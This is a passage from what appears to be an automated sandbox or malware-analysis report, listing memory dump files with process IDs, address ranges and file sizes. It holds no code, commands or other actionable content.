                                                                                                                                                    • memory/4532-330-0x0000000073470000-0x0000000073C18000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      7.7MB

                                                                                                                                                    • memory/4552-155-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4648-196-0x0000000073D00000-0x0000000074800000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      11.0MB

                                                                                                                                                    • memory/4648-158-0x0000000074F00000-0x00000000754B1000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      5.7MB

                                                                                                                                                    • memory/4648-169-0x0000000073470000-0x0000000073C18000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      7.7MB

                                                                                                                                                    • memory/4648-131-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4648-199-0x0000000074F00000-0x00000000754B1000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      5.7MB

                                                                                                                                                    • memory/4652-422-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4792-192-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4832-320-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4852-248-0x0000000005E50000-0x0000000005E8C000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      240KB

                                                                                                                                                    • memory/4852-179-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4852-258-0x0000000000B90000-0x0000000000BF0000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      384KB

                                                                                                                                                    • memory/4852-228-0x0000000000400000-0x00000000007C2000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      3.8MB

                                                                                                                                                    • memory/4852-242-0x0000000005D30000-0x0000000005E3A000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      1.0MB

                                                                                                                                                    • memory/4852-237-0x00000000062C0000-0x00000000068D8000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      6.1MB

                                                                                                                                                    • memory/4852-238-0x0000000005D10000-0x0000000005D22000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      72KB

                                                                                                                                                    • memory/4852-220-0x0000000000400000-0x00000000007C2000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      3.8MB

                                                                                                                                                    • memory/4876-246-0x0000000074F00000-0x00000000754B1000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      5.7MB

                                                                                                                                                    • memory/4876-269-0x0000000073470000-0x0000000073C18000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      7.7MB

                                                                                                                                                    • memory/4876-267-0x0000000073D00000-0x0000000074800000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      11.0MB

                                                                                                                                                    • memory/4876-154-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4876-265-0x0000000074F00000-0x00000000754B1000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      5.7MB

                                                                                                                                                    • memory/4876-253-0x0000000073D00000-0x0000000074800000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      11.0MB

                                                                                                                                                    • memory/4876-255-0x0000000073470000-0x0000000073C18000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      7.7MB

                                                                                                                                                    • memory/4892-418-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4916-400-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4948-334-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4948-342-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      352KB

                                                                                                                                                    • memory/4948-338-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      352KB

                                                                                                                                                    • memory/4984-381-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/5028-227-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/5044-218-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/5064-210-0x0000000010000000-0x00000000101B6000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      1.7MB

                                                                                                                                                    • memory/5064-185-0x0000000010000000-0x00000000101B6000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      1.7MB

                                                                                                                                                    • memory/5064-195-0x0000000010000000-0x00000000101B6000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      1.7MB

                                                                                                                                                    • memory/5064-193-0x0000000010000000-0x00000000101B6000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      1.7MB

                                                                                                                                                    • memory/5240-427-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/5280-429-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/5392-431-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/5552-433-0x0000000000000000-mapping.dmp